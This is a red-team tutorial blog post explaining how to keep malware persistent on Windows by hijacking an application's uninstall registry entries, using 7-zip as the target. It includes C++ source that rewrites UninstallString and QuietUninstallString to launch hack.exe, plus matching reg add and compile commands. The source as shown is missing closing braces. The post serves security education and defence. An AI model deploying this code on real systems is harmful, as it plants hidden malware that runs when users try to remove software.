2 minute read

Hello, cybersecurity enthusiasts and white hackers!


This post is the result of my own research into one of the interesting malware persistence trick: via hijacking uninstall file for target application.

uninstallation process

When you install a program on a Windows system, they usually point to their own uninstallers. They are in the registry keys:

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\<application name>


HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\QuietUninstallString\<application name>

So what is the trick? There is no problem with replacing them with commands that can run any other program. When a user executes the uninstaller, the command of the attacker’s choosing is executed. Again, the good news is that privileges are required to modify these items, as they reside under the HKLM key.

practical example

Let’s look at a practical example. Firstly, let’s choose a target application. I chose 7-zip x64:




Then, check registry key values, for correctness:

reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-zip" /s


Also, I prepared my evil application. It’s as usually meow-meow “malware” :)


Then, I create a program, which do my logic for persistence (pers.cpp):

windows persistence via
hijacking uninstall app
author: @cocomelonc
#include <windows.h>
#include <string.h>

int main(int argc, char* argv[]) {
  HKEY hkey = NULL;

  // target app
  const char* app = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\7-zip";

  // evil app
  const char* exe = "C:\\Users\\User\\Documents\\malware\\2022-10-04-malware-pers-13\\hack.exe";

  // app
  LONG res = RegOpenKeyEx(HKEY_LOCAL_MACHINE, (LPCSTR)app, 0 , KEY_WRITE, &hkey);
  if (res == ERROR_SUCCESS) {
    // update registry key value
    // reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\7-zip" /v "UninstallString" /t REG_SZ /d "...\hack.exe" /f
    RegSetValueEx(hkey, (LPCSTR)"UninstallString", 0, REG_SZ, (unsigned char*)exe, strlen(exe));
    RegSetValueEx(hkey, (LPCSTR)"QuietUninstallString", 0, REG_SZ, (unsigned char*)exe, strlen(exe));

  return 0;

As you can see, the logic is simple, we are just update target key values in registry.


Let’s go to see everything in action. Compile malware and persistence script:

x86_64-w64-mingw32-g++ -O2 pers.cpp -o pers.exe -I/usr/share/mingw-w64/include/ -s -ffunction-sections -fdata-sections -Wno-write-strings -fno-exceptions -fmerge-all-constants -static-libstdc++ -static-libgcc -fpermissive


And run at the victim’s machine - Windows 10 x64 in my case:



Finally, after reboot my system, tried to uninstall 7-zip:





Then I looked at the properties of hack.exe in Process Hacker 2:


as you can see the parent process is SystemSettings.exe - is what you see whenever you open your Windows settings. In our case, it is add/remove programs. Perfect! =^..^=

There are the little caveat. When I try to update key with path Z:\2022-10-04-malware-pers-13\hack.exe I get an error like this:


Maybe you can use only paths inside the disk C:\.

After end of the experiments, clean up:

reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\7-zip" /v "UninstallString" /t REG_SZ /d "C:\Program Files\7-zip\Uninstall.exe" /f



Of course, maybe this trick is not so cool for persistence, since it requires the permissions and participation of the victim’s user. But why not?

There is one more trick with using installing and removing programs for persistence, I will write about it in one of the future posts. I’m still in the process of investigating this possibility for the red team.

I hope this post spreads awareness to the blue teamers of this interesting technique, and adds a weapon to the red teamers arsenal.

reg query
source code in github

This is a practical case for educational purposes only.

Thanks for your time happy hacking and good bye!
PS. All drawings and screenshots are mine